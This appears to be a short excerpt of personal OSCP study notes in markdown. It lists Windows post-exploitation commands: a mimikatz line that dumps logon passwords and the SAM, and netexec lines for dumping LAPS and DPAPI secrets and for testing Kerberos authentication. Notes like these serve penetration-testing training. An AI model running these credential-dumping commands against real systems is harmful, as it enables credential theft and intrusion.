ezra-fast/OSCPNotes/Shortlists.md

 [if an Administrator, dump the local SAM and LSA using secretsdump or mimikatz] .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"

+[check if you can dump dpapi credentials with nxc or cme] netexec smb target -u username -p password --laps --dpapi

+[check if you can authenticate via kerberos] netexec smb target -u username -p password -k

 ```